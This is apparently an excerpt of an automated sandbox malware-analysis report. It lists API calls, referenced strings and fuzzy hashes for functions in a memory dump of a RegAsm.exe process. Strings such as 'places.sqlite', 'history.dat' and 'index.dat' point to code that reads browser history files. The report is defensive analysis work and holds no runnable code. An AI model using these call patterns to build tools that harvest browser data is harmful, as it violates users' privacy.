                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1979745280-0
                                                                                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 839530781-0
                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID: *.*$index.dat
                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1156039329-0
                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3397143404-0
                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                          • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1125800050-0
                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                          • String ID: }A
                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                          APIs
                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3056473165-0
                                                                                                                          • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                          • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: BINARY
                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                          • _mbscat.MSVCRT ref: 0040525B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 568699880-0
                                                                                                                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID: /stext
                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1023896661-0
                                                                                                                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2445788494-0
                                                                                                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: malloc
                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmpmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065087418-0
                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1381354015-0
                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2221118986-0
                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                          • Opcode Fuzzy Hash: 17a0de013ad5af1dada85eb60247efe04a4887ab005b4e4af9b3a400899dc410
                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2154303073-0
                                                                                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                          APIs
                                                                                                                          • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$PointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3154509469-0
                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
